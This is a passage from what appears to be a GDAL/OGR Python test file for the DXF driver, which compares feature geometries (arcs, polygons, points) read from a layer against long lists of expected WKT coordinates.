-6.76589518571785e-16,-5.8270909152852 4.4067366430758 -6.8270909152852e-16,-5.87938524157182 4.34202014332567 -6.87938524157182e-16,-5.92252339187664 4.275637355817 -6.92252339187664e-16,-5.95629520146761 4.20791169081776 -6.95629520146761e-16,-5.98053613748314 4.13917310096006 -6.98053613748314e-16,-5.99512810051965 4.06975647374412 -6.99512810051965e-16,-6.0 4.0 -7e-16,-5.99512810051965 3.93024352625587 -6.99512810051965e-16,-5.98053613748314 3.86082689903993 -6.98053613748314e-16,-5.95629520146761 3.79208830918224 -6.95629520146761e-16,
# -5.92252339187664 3.724362644183 -6.92252339187664e-16,-5.87938524157182 3.65797985667433 -6.87938524157182e-16,-5.8270909152852 3.5932633569242 -6.8270909152852e-16,-5.76589518571785 3.53052843721411 -6.76589518571785e-16,-5.69609619231285 3.4700807357668 -6.69609619231285e-16,-5.61803398874989 3.41221474770753 -6.61803398874989e-16,-5.53208888623796 3.35721239031346 -6.53208888623796e-16,-5.4386796006773 3.305341629541 -6.4386796006773e-16,-5.33826121271772 3.25685517452261 -6.33826121271772e-16,-5.23132295065132 3.21198924639328 -6.23132295065132e-16,-5.11838580694149 3.17096242744496 -6.11838580694149e-16,-5.0 3.13397459621556 -6e-16,-4.87674229357815 3.10120595370083 -5.87674229357816e-16,-4.74921318683182 3.07281614543321 -5.74921318683182e-16,-4.61803398874989 3.04894348370485 -5.6180339887499e-16,-4.48384379119934 3.029704273724 -5.48384379119934e-16,-4.34729635533386 3.01519224698779 -5.34729635533386e-16,-4.20905692653531 3.00547810463173 -5.20905692653531e-16,-4.069798993405 3.0006091729809 -5.069798993405e-16,-3.930201006595 3.0006091729809 -4.930201006595e-16,-3.79094307346469 3.00547810463173 -4.79094307346469e-16,-3.65270364466614 3.01519224698779 -4.65270364466614e-16,-3.51615620880066 3.029704273724 -4.51615620880066e-16,-3.38196601125011 3.04894348370485 -4.38196601125011e-16,-3.25078681316818 3.07281614543321 -4.25078681316818e-16,-3.12325770642185 3.10120595370083 -4.12325770642185e-16,-3.0 3.13397459621556 -4e-16,-2.88161419305851 3.17096242744496 -3.88161419305851e-16,-2.76867704934868 3.21198924639328 -3.76867704934868e-16,-2.66173878728228 3.25685517452261 -3.66173878728228e-16,-2.5613203993227 3.305341629541 -3.5613203993227e-16,-2.46791111376204 3.35721239031346 -3.46791111376204e-16,-2.38196601125011 3.41221474770753 -3.38196601125011e-16,-2.30390380768715 3.4700807357668 -3.30390380768715e-16,-2.23410481428215 3.53052843721411 -3.23410481428215e-16,-2.1729090847148 3.5932633569242 -3.1729090847148e-16,-2.12061475842818 3.65797985667433 -3.12061475842818e-16,-2.07747660812336 3.724362644183 -3.07747660812336e-16,-2.04370479853239 3.79208830918224 -3.04370479853239e-16,-2.01946386251686 3.86082689903993 -3.01946386251686e-16,-2.00487189948035 3.93024352625587 -3.00487189948035e-16,-2 4 -3e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2 4 -3e-16,-2.00487189948035 4.06975647374412 -3.00487189948035e-16,-2.01946386251686 4.13917310096007 -3.01946386251686e-16,-2.04370479853239 4.20791169081776 -3.04370479853239e-16,-2.07747660812336 4.275637355817 -3.07747660812336e-16,-2.12061475842818 4.34202014332567 -3.12061475842818e-16,-2.1729090847148 4.4067366430758 -3.1729090847148e-16,-2.23410481428215 4.46947156278589 -3.23410481428215e-16,-2.30390380768715 4.52991926423321 -3.30390380768715e-16,-2.38196601125011 4.58778525229247 -3.38196601125011e-16,-2.46791111376204 4.64278760968654 -3.46791111376204e-16,-2.5613203993227 4.694658370459 -3.5613203993227e-16,-2.66173878728228 4.74314482547739 -3.66173878728228e-16,-2.76867704934868 4.78801075360672 -3.76867704934868e-16,-2.88161419305851 4.82903757255504 -3.88161419305851e-16,-3.0 4.86602540378444 -4e-16,-3.12325770642185 4.89879404629917 -4.12325770642185e-16,-3.25078681316818 4.92718385456679 -4.25078681316818e-16,-3.38196601125011 4.95105651629515 -4.38196601125011e-16,-3.51615620880067 4.970295726276 -4.51615620880067e-16,-3.65270364466614 4.98480775301221 -4.65270364466614e-16,-3.79094307346469 4.99452189536827 -4.79094307346469e-16,-3.930201006595 4.9993908270191 -4.930201006595e-16,-4.069798993405 4.9993908270191 -5.069798993405e-16,-4.20905692653531 4.99452189536827 -5.20905692653531e-16,-4.34729635533386 4.98480775301221 -5.34729635533386e-16,-4.48384379119934 4.970295726276 -5.48384379119934e-16,-4.61803398874989 4.95105651629515 -5.6180339887499e-16,-4.74921318683182 4.92718385456679 -5.74921318683183e-16,-4.87674229357816 4.89879404629917 -5.87674229357816e-16,-5.0 4.86602540378444 -6e-16,-5.11838580694149 4.82903757255504 -6.1183858069415e-16,-5.23132295065132 4.78801075360672 -6.23132295065132e-16,-5.33826121271772 4.74314482547739 -6.33826121271772e-16,-5.4386796006773 4.694658370459 -6.4386796006773e-16,-5.53208888623796 4.64278760968654 -6.53208888623796e-16,-5.61803398874989 4.58778525229247 -6.61803398874989e-16,-5.69609619231285 4.5299192642332 -6.69609619231285e-16,-5.76589518571785 4.46947156278589 -6.76589518571785e-16,-5.8270909152852 4.4067366430758 -6.8270909152852e-16,-5.87938524157182 4.34202014332567 -6.87938524157182e-16,-5.92252339187664 4.275637355817 -6.92252339187664e-16,-5.95629520146761 4.20791169081776 -6.95629520146761e-16,-5.98053613748314 4.13917310096006 -6.98053613748314e-16,-5.99512810051965 4.06975647374412 -6.99512810051965e-16,-6.0 4.0 -7e-16,-5.99512810051965 3.93024352625587 -6.99512810051965e-16,-5.98053613748314 3.86082689903993 -6.98053613748314e-16,-5.95629520146761 3.79208830918224 -6.95629520146761e-16,' + \
'-5.92252339187664 3.724362644183 -6.92252339187664e-16,-5.87938524157182 3.65797985667433 -6.87938524157182e-16,-5.8270909152852 3.5932633569242 -6.8270909152852e-16,-5.76589518571785 3.53052843721411 -6.76589518571785e-16,-5.69609619231285 3.4700807357668 -6.69609619231285e-16,-5.61803398874989 3.41221474770753 -6.61803398874989e-16,-5.53208888623796 3.35721239031346 -6.53208888623796e-16,-5.4386796006773 3.305341629541 -6.4386796006773e-16,-5.33826121271772 3.25685517452261 -6.33826121271772e-16,-5.23132295065132 3.21198924639328 -6.23132295065132e-16,-5.11838580694149 3.17096242744496 -6.11838580694149e-16,-5.0 3.13397459621556 -6e-16,-4.87674229357815 3.10120595370083 -5.87674229357816e-16,-4.74921318683182 3.07281614543321 -5.74921318683182e-16,-4.61803398874989 3.04894348370485 -5.6180339887499e-16,-4.48384379119934 3.029704273724 -5.48384379119934e-16,-4.34729635533386 3.01519224698779 -5.34729635533386e-16,-4.20905692653531 3.00547810463173 -5.20905692653531e-16,-4.069798993405 3.0006091729809 -5.069798993405e-16,-3.930201006595 3.0006091729809 -4.930201006595e-16,-3.79094307346469 3.00547810463173 -4.79094307346469e-16,-3.65270364466614 3.01519224698779 -4.65270364466614e-16,-3.51615620880066 3.029704273724 -4.51615620880066e-16,-3.38196601125011 3.04894348370485 -4.38196601125011e-16,-3.25078681316818 3.07281614543321 -4.25078681316818e-16,-3.12325770642185 3.10120595370083 -4.12325770642185e-16,-3.0 3.13397459621556 -4e-16,-2.88161419305851 3.17096242744496 -3.88161419305851e-16,-2.76867704934868 3.21198924639328 -3.76867704934868e-16,-2.66173878728228 3.25685517452261 -3.66173878728228e-16,-2.5613203993227 3.305341629541 -3.5613203993227e-16,-2.46791111376204 3.35721239031346 -3.46791111376204e-16,-2.38196601125011 3.41221474770753 -3.38196601125011e-16,-2.30390380768715 3.4700807357668 -3.30390380768715e-16,-2.23410481428215 3.53052843721411 -3.23410481428215e-16,-2.1729090847148 3.5932633569242 -3.1729090847148e-16,-2.12061475842818 3.65797985667433 -3.12061475842818e-16,-2.07747660812336 3.724362644183 -3.07747660812336e-16,-2.04370479853239 3.79208830918224 -3.04370479853239e-16,-2.01946386251686 3.86082689903993 -3.01946386251686e-16,-2.00487189948035 3.93024352625587 -3.00487189948035e-16,-2 4 -3e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):19
# EntityHandle (String) = 20D
# LINESTRING Z (-2.0 2.0 -2e-16,-1.96657794502105 2.03582232791524 -1.96657794502105e-16,-1.93571660708646 2.07387296203834 -1.93571660708646e-16,-1.90756413746468 2.11396923855471 -1.90756413746468e-16,-1.88225568337755 2.15591867344963 -1.88225568337755e-16,-1.85991273921989 2.19951988653655 -1.85991273921989e-16,-1.84064256332004 2.24456356819194 -1.84064256332004e-16,-1.8245376630414 2.29083348415575 -1.8245376630414e-16,-1.81167535069652 2.33810751357387 -1.81167535069652e-16,-1.80211737240583 2.38615871529951 -1.80211737240583e-16,-1.79590961168258 2.43475641733454 -1.79590961168258e-16,-1.79308186916688 2.48366732418105 -1.79308186916688e-16,-1.79364771956639 2.53265663678705 -1.79364771956639e-16,-1.79760444649032 2.58148917971011 -1.79760444649032e-16,-1.80493305548955 2.62993053008785 -1.80493305548955e-16,-1.81559836524041 2.67774814299566 -1.81559836524041e-16,-1.8295491764342 2.72471246778926 -1.8295491764342e-16,-1.84671851756181 2.7705980500731 -1.84671851756181e-16,-1.86702396641357 2.81518461400453 -1.86702396641357e-16,-1.89036804575079 2.85825811973811 -1.89036804575079e-16,-1.91663869124976 2.89961179093366 -1.91663869124976e-16,-1.94570978947168 2.93904710739563 -1.94570978947168e-16,-1.97744178327594 2.97637475807832 -1.97744178327594e-16,-2.01168234177068 3.01141554988232 -2.01168234177068e-16,-2.04826709158413 3.04400126787917 -2.04826709158413e-16,-2.08702040594658 3.07397548283483 -2.08702040594658e-16,-2.12775624779472 3.10119430215541 -2.12775624779472e-16,-2.17027906285109 3.12552706065018 -2.17027906285109e-16,-2.2143847183914 3.14685694779575 -2.2143847183914e-16,-2.25986148319297 3.16508156849045 -2.25986148319297e-16,-2.30649104396024 3.18011343460661 -2.30649104396024e-16,-2.35404955334774 3.1918803849814 -2.35404955334774e-16,-2.40230870454951 3.20032593182975 -2.40230870454951e-16,-2.45103682729644 3.2054095319166 -2.45103682729644e-16,-2.5 3.20710678118655 -2.5e-16,-2.54896317270356 3.2054095319166 -2.54896317270356e-16,-2.59769129545049 3.20032593182975 -2.59769129545049e-16,-2.64595044665226 3.1918803849814 -2.64595044665226e-16,-2.69350895603976 3.18011343460661 -2.69350895603976e-16,-2.74013851680703 3.16508156849045 -2.74013851680703e-16,-2.7856152816086 3.14685694779575 -2.7856152816086e-16,-2.8297209371489 3.12552706065018 -2.8297209371489e-16,-2.87224375220528 3.10119430215541 -2.87224375220528e-16,-2.91297959405342 3.07397548283483 -2.91297959405342e-16,-2.95173290841587 3.04400126787917 -2.95173290841587e-16,-2.98831765822932 3.01141554988232 -2.98831765822932e-16,-3.02255821672406 2.97637475807832 -3.02255821672406e-16,-3.05429021052832 2.93904710739563 -3.05429021052832e-16,-3.08336130875024 2.89961179093367 -3.08336130875024e-16,-3.10963195424921 2.85825811973811 -3.10963195424921e-16,-3.13297603358643 2.81518461400453 -3.13297603358643e-16,-3.15328148243819 2.7705980500731 -3.15328148243819e-16,-3.1704508235658 2.72471246778926 -3.1704508235658e-16,-3.18440163475959 2.67774814299567 -3.18440163475959e-16,-3.19506694451045 2.62993053008786 -3.19506694451045e-16,-3.20239555350968 2.58148917971011 -3.20239555350968e-16,-3.20635228043361 2.53265663678705 -3.20635228043361e-16,-3.20691813083312 2.48366732418105 -3.20691813083312e-16,-3.20409038831742 2.43475641733454 -3.20409038831742e-16,-3.19788262759417 2.38615871529951 -3.19788262759417e-16,-3.18832464930348 2.33810751357387 -3.18832464930349e-16,-3.1754623369586 2.29083348415575 -3.1754623369586e-16,-3.15935743667996 2.24456356819194 -3.15935743667996e-16,-3.14008726078011 2.19951988653655 -3.14008726078011e-16,-3.11774431662245 2.15591867344963 -3.11774431662245e-16,-3.09243586253532 2.11396923855472 -3.09243586253532e-16,-3.06428339291354 2.07387296203834 -3.06428339291354e-16,-3.03342205497895 2.03582232791524 -3.03342205497895e-16,-3 2 -3e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 2.0 -2e-16,-1.96657794502105 2.03582232791524 -1.96657794502105e-16,-1.93571660708646 2.07387296203834 -1.93571660708646e-16,-1.90756413746468 2.11396923855471 -1.90756413746468e-16,-1.88225568337755 2.15591867344963 -1.88225568337755e-16,-1.85991273921989 2.19951988653655 -1.85991273921989e-16,-1.84064256332004 2.24456356819194 -1.84064256332004e-16,-1.8245376630414 2.29083348415575 -1.8245376630414e-16,-1.81167535069652 2.33810751357387 -1.81167535069652e-16,-1.80211737240583 2.38615871529951 -1.80211737240583e-16,-1.79590961168258 2.43475641733454 -1.79590961168258e-16,-1.79308186916688 2.48366732418105 -1.79308186916688e-16,-1.79364771956639 2.53265663678705 -1.79364771956639e-16,-1.79760444649032 2.58148917971011 -1.79760444649032e-16,-1.80493305548955 2.62993053008785 -1.80493305548955e-16,-1.81559836524041 2.67774814299566 -1.81559836524041e-16,-1.8295491764342 2.72471246778926 -1.8295491764342e-16,-1.84671851756181 2.7705980500731 -1.84671851756181e-16,-1.86702396641357 2.81518461400453 -1.86702396641357e-16,-1.89036804575079 2.85825811973811 -1.89036804575079e-16,-1.91663869124976 2.89961179093366 -1.91663869124976e-16,-1.94570978947168 2.93904710739563 -1.94570978947168e-16,-1.97744178327594 2.97637475807832 -1.97744178327594e-16,-2.01168234177068 3.01141554988232 -2.01168234177068e-16,-2.04826709158413 3.04400126787917 -2.04826709158413e-16,-2.08702040594658 3.07397548283483 -2.08702040594658e-16,-2.12775624779472 3.10119430215541 -2.12775624779472e-16,-2.17027906285109 3.12552706065018 -2.17027906285109e-16,-2.2143847183914 3.14685694779575 -2.2143847183914e-16,-2.25986148319297 3.16508156849045 -2.25986148319297e-16,-2.30649104396024 3.18011343460661 -2.30649104396024e-16,-2.35404955334774 3.1918803849814 -2.35404955334774e-16,-2.40230870454951 3.20032593182975 -2.40230870454951e-16,-2.45103682729644 3.2054095319166 -2.45103682729644e-16,' + \
'-2.5 3.20710678118655 -2.5e-16,-2.54896317270356 3.2054095319166 -2.54896317270356e-16,-2.59769129545049 3.20032593182975 -2.59769129545049e-16,-2.64595044665226 3.1918803849814 -2.64595044665226e-16,-2.69350895603976 3.18011343460661 -2.69350895603976e-16,-2.74013851680703 3.16508156849045 -2.74013851680703e-16,-2.7856152816086 3.14685694779575 -2.7856152816086e-16,-2.8297209371489 3.12552706065018 -2.8297209371489e-16,-2.87224375220528 3.10119430215541 -2.87224375220528e-16,-2.91297959405342 3.07397548283483 -2.91297959405342e-16,-2.95173290841587 3.04400126787917 -2.95173290841587e-16,-2.98831765822932 3.01141554988232 -2.98831765822932e-16,-3.02255821672406 2.97637475807832 -3.02255821672406e-16,-3.05429021052832 2.93904710739563 -3.05429021052832e-16,-3.08336130875024 2.89961179093367 -3.08336130875024e-16,-3.10963195424921 2.85825811973811 -3.10963195424921e-16,-3.13297603358643 2.81518461400453 -3.13297603358643e-16,-3.15328148243819 2.7705980500731 -3.15328148243819e-16,-3.1704508235658 2.72471246778926 -3.1704508235658e-16,-3.18440163475959 2.67774814299567 -3.18440163475959e-16,-3.19506694451045 2.62993053008786 -3.19506694451045e-16,-3.20239555350968 2.58148917971011 -3.20239555350968e-16,-3.20635228043361 2.53265663678705 -3.20635228043361e-16,-3.20691813083312 2.48366732418105 -3.20691813083312e-16,-3.20409038831742 2.43475641733454 -3.20409038831742e-16,-3.19788262759417 2.38615871529951 -3.19788262759417e-16,-3.18832464930348 2.33810751357387 -3.18832464930349e-16,-3.1754623369586 2.29083348415575 -3.1754623369586e-16,-3.15935743667996 2.24456356819194 -3.15935743667996e-16,-3.14008726078011 2.19951988653655 -3.14008726078011e-16,-3.11774431662245 2.15591867344963 -3.11774431662245e-16,-3.09243586253532 2.11396923855472 -3.09243586253532e-16,-3.06428339291354 2.07387296203834 -3.06428339291354e-16,-3.03342205497895 2.03582232791524 -3.03342205497895e-16,-3 2 -3e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):20
# EntityHandle (String) = 20E
# POLYGON Z ((-1 2 -1e-16,-1 3 -1e-16,-2 3 -2e-16,-2 2 -2e-16,-1 2 -1e-16))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((-1 2 -1e-16,-1 3 -1e-16,-2 3 -2e-16,-2 2 -2e-16,-1 2 -1e-16))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):21
# EntityHandle (String) = 20F
# POLYGON ((-3 4,-4 4,-4 3,-3 3,-3 4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-3 4,-4 4,-4 3,-3 3,-3 4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):22
# EntityHandle (String) = 211
# POLYGON ((-8 8,-9 8,-9 9,-8 9,-8 8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-8 8,-9 8,-9 9,-8 9,-8 8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):23
# EntityHandle (String) = 212
# LINESTRING (-2 2,-2.15384615384615 2.15384615384615,-2.30769230769231 2.30769230769231,-2.46153846153846 2.46153846153846,-2.61538461538461 2.61538461538461,-2.76923076923077 2.76923076923077,-2.92307692307692 2.92307692307692,-3.07692307692308 3.07692307692308,-3.23076923076923 3.23076923076923,-3.38461538461538 3.38461538461538,-3.53846153846154 3.53846153846154,-3.69230769230769 3.69230769230769,-3.84615384615385 3.84615384615385,-4 4,-4.15384615384615 4.15384615384615,-4.30769230769231 4.30769230769231,-4.46153846153846 4.46153846153846,-4.61538461538462 4.61538461538462,-4.76923076923077 4.76923076923077,-4.92307692307692 4.92307692307692,-5.07692307692308 5.07692307692308,-5.23076923076923 5.23076923076923,-5.38461538461538 5.38461538461538,-5.53846153846154 5.53846153846154,-5.69230769230769 5.69230769230769,-5.84615384615385 5.84615384615385,-6.0 6.0,-6.15384615384615 6.15384615384615,-6.30769230769231 6.30769230769231,-6.46153846153846 6.46153846153846,-6.61538461538462 6.61538461538462,-6.76923076923077 6.76923076923077,-6.92307692307692 6.92307692307692,-7.07692307692308 7.07692307692308,-7.23076923076923 7.23076923076923,-7.38461538461539 7.38461538461539,-7.53846153846154 7.53846153846154,-7.69230769230769 7.69230769230769,-7.84615384615385 7.84615384615385,-8 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-2 2,-2.15384615384615 2.15384615384615,-2.30769230769231 2.30769230769231,-2.46153846153846 2.46153846153846,-2.61538461538461 2.61538461538461,-2.76923076923077 2.76923076923077,-2.92307692307692 2.92307692307692,-3.07692307692308 3.07692307692308,-3.23076923076923 3.23076923076923,-3.38461538461538 3.38461538461538,-3.53846153846154 3.53846153846154,-3.69230769230769 3.69230769230769,-3.84615384615385 3.84615384615385,-4 4,-4.15384615384615 4.15384615384615,-4.30769230769231 4.30769230769231,-4.46153846153846 4.46153846153846,-4.61538461538462 4.61538461538462,-4.76923076923077 4.76923076923077,-4.92307692307692 4.92307692307692,-5.07692307692308 5.07692307692308,-5.23076923076923 5.23076923076923,-5.38461538461538 5.38461538461538,-5.53846153846154 5.53846153846154,-5.69230769230769 5.69230769230769,-5.84615384615385 5.84615384615385,-6.0 6.0,-6.15384615384615 6.15384615384615,-6.30769230769231 6.30769230769231,-6.46153846153846 6.46153846153846,-6.61538461538462 6.61538461538462,-6.76923076923077 6.76923076923077,-6.92307692307692 6.92307692307692,-7.07692307692308 7.07692307692308,-7.23076923076923 7.23076923076923,-7.38461538461539 7.38461538461539,-7.53846153846154 7.53846153846154,-7.69230769230769 7.69230769230769,-7.84615384615385 7.84615384615385,-8 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):24
# EntityHandle (String) = 213
# LINESTRING (-8 1,-7.62837370825536 0.987348067229724,-7.25775889681215 0.975707614760869,-6.88916704597178 0.966090122894857,-6.52360963603567 0.959507071933107,-6.16209814730525 0.956969942177043,-5.80564406008193 0.959490213928084,-5.45525885466714 0.968079367487651,-5.11195401136229 0.983748883157167,-4.77674101046882 1.00751024123805,-4.45063133228814 1.04037492203173,-4.13463645712167 1.08335440583961,-3.82976786527082 1.13746017296313,-3.53703703703704 1.2037037037037,-3.25745545272173 1.28309647836275,-2.99203459262631 1.37664997724169,-2.74178593705221 1.48537568064195,-2.50772096630085 1.61028506886495,-2.29085116067365 1.75238962221211,-2.09218800047203 1.91270082098484,-1.91270082098485 2.09218800047202,-1.75238962221211 2.29085116067364,-1.61028506886495 2.50772096630085,-1.48537568064195 2.74178593705221,-1.37664997724169 2.99203459262631,-1.28309647836275 3.25745545272172,-1.2037037037037 3.53703703703703,-1.13746017296313 3.82976786527082,-1.08335440583961 4.13463645712166,-1.04037492203173 4.45063133228814,-1.00751024123805 4.77674101046882,-0.983748883157167 5.11195401136229,-0.968079367487652 5.45525885466714,-0.959490213928084 5.80564406008193,-0.956969942177043 6.16209814730525,-0.959507071933108 6.52360963603567,-0.966090122894857 6.88916704597178,-0.975707614760869 7.25775889681216,-0.987348067229724 7.62837370825537,-1 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-8 1,-7.62837370825536 0.987348067229724,-7.25775889681215 0.975707614760869,-6.88916704597178 0.966090122894857,-6.52360963603567 0.959507071933107,-6.16209814730525 0.956969942177043,-5.80564406008193 0.959490213928084,-5.45525885466714 0.968079367487651,-5.11195401136229 0.983748883157167,-4.77674101046882 1.00751024123805,-4.45063133228814 1.04037492203173,-4.13463645712167 1.08335440583961,-3.82976786527082 1.13746017296313,-3.53703703703704 1.2037037037037,-3.25745545272173 1.28309647836275,-2.99203459262631 1.37664997724169,-2.74178593705221 1.48537568064195,-2.50772096630085 1.61028506886495,-2.29085116067365 1.75238962221211,-2.09218800047203 1.91270082098484,-1.91270082098485 2.09218800047202,-1.75238962221211 2.29085116067364,-1.61028506886495 2.50772096630085,-1.48537568064195 2.74178593705221,-1.37664997724169 2.99203459262631,-1.28309647836275 3.25745545272172,-1.2037037037037 3.53703703703703,-1.13746017296313 3.82976786527082,-1.08335440583961 4.13463645712166,-1.04037492203173 4.45063133228814,-1.00751024123805 4.77674101046882,-0.983748883157167 5.11195401136229,-0.968079367487652 5.45525885466714,-0.959490213928084 5.80564406008193,-0.956969942177043 6.16209814730525,-0.959507071933108 6.52360963603567,-0.966090122894857 6.88916704597178,-0.975707614760869 7.25775889681216,-0.987348067229724 7.62837370825537,-1 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):25
# EntityHandle (String) = 214
# POINT Z (-7 7 -7e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-7 7 -7e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):26
# EntityHandle (String) = 215
# POINT Z (-4 -4 -1e-15)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-4 -4 -1e-15)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):27
# EntityHandle (String) = 216
# LINESTRING Z (0 0 -2e-16,-1 -1 -5e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 -2e-16,-1 -1 -5e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):28
# EntityHandle (String) = 217
# LINESTRING (-1 -1,-2 -1,-1 -2,-1 -1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-1 -1,-2 -1,-1 -2,-1 -1)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):29
# EntityHandle (String) = 218
# LINESTRING Z (-1 -1 -2e-16,-1 -2 -4e-16,-2 -2 -5e-16,-1 -1 -2e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1 -1 -2e-16,-1 -2 -4e-16,-2 -2 -5e-16,-1 -1 -2e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):30
# EntityHandle (String) = 21D
# LINESTRING Z (-2 -4 0,-2.00487189948035 -4.13951294748825 0,-2.01946386251686 -4.27834620192013 0,-2.04370479853239 -4.41582338163552 0,-2.07747660812336 -4.551274711634 0,-2.12061475842818 -4.68404028665134 0,-2.1729090847148 -4.8134732861516 0,-2.23410481428215 -4.93894312557178 0,-2.30390380768715 -5.05983852846641 0,-2.38196601125011 -5.17557050458495 0,-2.46791111376204 -5.28557521937308 0,-2.5613203993227 -5.38931674091799 0,-2.66173878728228 -5.48628965095479 0,-2.76867704934868 -5.57602150721344 0,-2.88161419305851 -5.65807514511008 0,-3.0 -5.73205080756888 0,-3.12325770642185 -5.79758809259833 0,-3.25078681316818 -5.85436770913357 0,-3.38196601125011 -5.90211303259031 0,-3.51615620880066 -5.94059145255199 0,-3.65270364466614 -5.96961550602442 0,-3.79094307346469 -5.98904379073655 0,-3.930201006595 -5.99878165403819 0,-4.069798993405 -5.99878165403819 0,-4.20905692653531 -5.98904379073655 0,-4.34729635533386 -5.96961550602442 0,-4.48384379119934 -5.94059145255199 0,-4.61803398874989 -5.90211303259031 0,-4.74921318683182 -5.85436770913357 0,-4.87674229357815 -5.79758809259833 0,-5.0 -5.73205080756888 0,-5.11838580694149 -5.65807514511008 0,-5.23132295065132 -5.57602150721344 0,-5.33826121271772 -5.48628965095479 0,-5.4386796006773 -5.38931674091799 0,-5.53208888623796 -5.28557521937308 0,-5.61803398874989 -5.17557050458495 0,-5.69609619231285 -5.05983852846641 0,-5.76589518571785 -4.93894312557178 0,-5.8270909152852 -4.8134732861516 0,-5.87938524157182 -4.68404028665134 0,-5.92252339187664 -4.551274711634 0,-5.95629520146761 -4.41582338163552 0,-5.98053613748314 -4.27834620192013 0,-5.99512810051965 -4.13951294748825 0,-6 -4 0,-5.99512810051965 -3.86048705251175 0,-5.98053613748314 -3.72165379807987 0,-5.95629520146761 -3.58417661836448 0,-5.92252339187664 -3.448725288366 0,-5.87938524157182 -3.31595971334866 0,-5.8270909152852 -3.1865267138484 0,-5.76589518571785 -3.06105687442822 0,-5.69609619231285 -2.94016147153359 0,-5.61803398874989 -2.82442949541505 0,-5.53208888623796 -2.71442478062692 0,-5.4386796006773 -2.61068325908201 0,-5.33826121271772 -2.51371034904521 0,-5.23132295065132 -2.42397849278656 0,-5.11838580694149 -2.34192485488992 0,-5.0 -2.26794919243112 0,-4.87674229357816 -2.20241190740167 0,-4.74921318683182 -2.14563229086643 0,-4.61803398874989 -2.09788696740969 0,-4.48384379119934 -2.05940854744801 0,-4.34729635533386 -2.03038449397558 0,-4.20905692653531 -2.01095620926345 0,-4.069798993405 -2.00121834596181 0,-3.930201006595 -2.00121834596181 0,-3.79094307346469 -2.01095620926345 0,-3.65270364466614 -2.03038449397558 0,-3.51615620880067 -2.05940854744801 0,-3.38196601125011 -2.09788696740969 0,-3.25078681316818 -2.14563229086643 0,-3.12325770642185 -2.20241190740167 0,-3.0 -2.26794919243112 0,-2.88161419305851 -2.34192485488992 0,-2.76867704934868 -2.42397849278656 0,-2.66173878728228 -2.51371034904521 0,-2.5613203993227 -2.610683259082 0,-2.46791111376204 -2.71442478062692 0,-2.38196601125011 -2.82442949541505 0,-2.30390380768715 -2.94016147153359 0,-2.23410481428215 -3.06105687442822 0,-2.1729090847148 -3.1865267138484 0,-2.12061475842818 -3.31595971334866 0,-2.07747660812336 -3.448725288366 0,-2.04370479853239 -3.58417661836448 0,-2.01946386251686 -3.72165379807987 0,-2.00487189948035 -3.86048705251175 0,-2.0 -4.0 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2 -4 0,-2.00487189948035 -4.13951294748825 0,-2.01946386251686 -4.27834620192013 0,-2.04370479853239 -4.41582338163552 0,-2.07747660812336 -4.551274711634 0,-2.12061475842818 -4.68404028665134 0,-2.1729090847148 -4.8134732861516 0,-2.23410481428215 -4.93894312557178 0,-2.30390380768715 -5.05983852846641 0,-2.38196601125011 -5.17557050458495 0,-2.46791111376204 -5.28557521937308 0,-2.5613203993227 -5.38931674091799 0,-2.66173878728228 -5.48628965095479 0,-2.76867704934868 -5.57602150721344 0,-2.88161419305851 -5.65807514511008 0,-3.0 -5.73205080756888 0,-3.12325770642185 -5.79758809259833 0,-3.25078681316818 -5.85436770913357 0,-3.38196601125011 -5.90211303259031 0,-3.51615620880066 -5.94059145255199 0,-3.65270364466614 -5.96961550602442 0,-3.79094307346469 -5.98904379073655 0,-3.930201006595 -5.99878165403819 0,-4.069798993405 -5.99878165403819 0,-4.20905692653531 -5.98904379073655 0,-4.34729635533386 -5.96961550602442 0,-4.48384379119934 -5.94059145255199 0,-4.61803398874989 -5.90211303259031 0,-4.74921318683182 -5.85436770913357 0,-4.87674229357815 -5.79758809259833 0,-5.0 -5.73205080756888 0,-5.11838580694149 -5.65807514511008 0,-5.23132295065132 -5.57602150721344 0,-5.33826121271772 -5.48628965095479 0,-5.4386796006773 -5.38931674091799 0,-5.53208888623796 -5.28557521937308 0,-5.61803398874989 -5.17557050458495 0,-5.69609619231285 -5.05983852846641 0,-5.76589518571785 -4.93894312557178 0,-5.8270909152852 -4.8134732861516 0,-5.87938524157182 -4.68404028665134 0,-5.92252339187664 -4.551274711634 0,-5.95629520146761 -4.41582338163552 0,-5.98053613748314 -4.27834620192013 0,-5.99512810051965 -4.13951294748825 0,-6 -4 0,-5.99512810051965 -3.86048705251175 0,-5.98053613748314 -3.72165379807987 0,-5.95629520146761 -3.58417661836448 0,-5.92252339187664 -3.448725288366 0,-5.87938524157182 -3.31595971334866 0,-5.8270909152852 -3.1865267138484 